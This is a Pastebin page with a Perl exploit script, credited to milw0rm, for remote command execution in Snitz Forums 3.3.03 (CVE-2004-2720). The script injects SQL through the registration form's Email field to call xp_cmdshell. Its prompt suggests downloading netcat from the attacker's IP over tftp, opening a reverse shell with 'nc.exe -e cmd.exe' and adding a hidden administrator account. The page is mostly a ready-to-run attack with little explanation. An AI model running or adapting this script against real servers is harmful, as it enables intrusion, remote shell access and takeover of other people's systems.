API tools faq
paste
Advertisement
FlyFar

Snitz Forums 3.3.03 - Remote Command Execution - CVE-2004-2720

FlyFar
Jan 24th, 2024
681
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.39 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2.  
  3. use Socket;
  4.  
  5. print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
  6. print "You accept full responsibility for your actions by using this script.\n";
  7. print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";
  8.  
  9. print "\nWeb server? [www.enterthegame.com]: ";
  10. my $webserver = <STDIN>;
  11. chomp $webserver;
  12. if( $webserver eq "" )
  13. {
  14. $webserver = "www.enterthegame.com";
  15. }
  16.  
  17. print "\nWeb server port? [80]: ";
  18. my $port = <STDIN>;
  19. chomp $port;
  20. if( $port eq "" )
  21. {
  22. $port = 80;
  23. }
  24.  
  25. print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
  26. my $path = <STDIN>;
  27. chomp $path;
  28. if( $path eq "" )
  29. {
  30. $path = "/forum/register.asp";
  31. }
  32.  
  33. print "\nCommand to execute non-interactively\n";
  34. print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
  35. print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
  36. print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
  37. print "Your command: ";
  38. my $command = <STDIN>;
  39. chomp $command;
  40. $command =~ s/\ /\%20/g;
  41.  
  42. if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
  43. {
  44. print "Error connecting to $webserver\n";
  45. exit( 0 );
  46. }
  47. else
  48. {
  49. my $data1 = $path . "\?mode\=DoIt";
  50. my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
  51. my $length = length( $data2 );
  52.  
  53. print FILEHANDLE "POST $data1 HTTP/1.1\n";
  54. if( $port == 80 )
  55. {
  56. print FILEHANDLE "Host: $webserver\n";
  57. }
  58. else
  59. {
  60. print FILEHANDLE "Host: $webserver:$port\n";
  61. }
  62. print FILEHANDLE "Accept: */*\n";
  63. print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
  64. print FILEHANDLE "Keep-Alive: 300\n";
  65. print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
  66. print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
  67. print FILEHANDLE "Content-Length: $length\n\n";
  68. print FILEHANDLE "$data2";
  69.  
  70. print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
  71. print "netcat, hit \"enter\" a couple of times to be safe.\n\n";
  72.  
  73. close( FILEHANDLE );
  74. }
  75.  
  76. sub open_TCP
  77. {
  78. my( $FS, $dest, $port ) = @_;
  79.  
  80. my $proto = getprotobyname( 'tcp' );
  81. socket( $FS, PF_INET, SOCK_STREAM, $proto );
  82. my $sin = sockaddr_in( $port, inet_aton( $dest ));
  83. connect( $FS, $sin ) || return undef;
  84.  
  85. my $old_fh = select( $FS );
  86. $| = 1;
  87. select( $old_fh );
  88. return 1;
  89. }
  90.  
  91. # milw0rm.com [2003-05-12]
  92.            
Tags: Exploit CVE command remote execution vullnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!